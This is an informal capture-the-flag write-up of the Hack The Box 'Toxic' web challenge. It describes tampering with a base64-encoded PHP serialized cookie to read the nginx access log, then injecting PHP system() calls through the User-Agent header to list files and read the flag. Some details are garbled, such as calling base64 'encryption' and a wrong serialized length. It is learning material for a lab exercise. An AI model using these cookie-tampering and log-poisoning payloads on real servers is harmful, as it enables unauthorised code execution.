Introduction
Hi I’m Ajith ,We are going to complete the Toxic – Web challenge in the hack the box, It’s very easy challenge.
Connecting to the Toxic
First, We want connect the VPN to the hack box and start the instance to get the IP address and copy the paste IP address into the browser. It will show the Dart Frog interface page and download the file in HackTheBox.
Nmap Scan
Now, we want to scan the IP address to see what services and servers are running under it. Finally we found the ngnix running in the webserver
Analyzing File
We downloaded the toxic file and analysed it. The cookie is encrypted using base64 in the index.php file that was located.
Decrypted cookie
We took encrypted cookie in the website and try to decrypt the cookie finally we found some information in the encrypted cookie is size is 15 location file is /www/index.html
0:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}Changing cookie and header
We modify the cookie value, encrypt it, and then post it in the PHPSESSID value.
0:9:"PageModel":1:{s:4:"file";s:15:"/var/log/nginx/access.log";}
Modifying the cookie and the header to direct forward to a website that uses a Burpsuite.
User-Agent: <?php system('ls -l/');?>
Finally we found to the flag file.
Found the flag
Now, We modify the header to open the flag file using the cat command and forward to the website using the burpsuite
User-Agent: <?php system('cat /flag_32q6G');?>
Finally, We found the flag in the website
Another Approach
We use another method to complete the challenge to find the flag. It was very simple, using python code to complete the challenge
This was the output of this challenge
Conclusion
A pretty easy challenge, Just a file Injection and we have found the flag. Out of 10, I would rate 2 out of 10
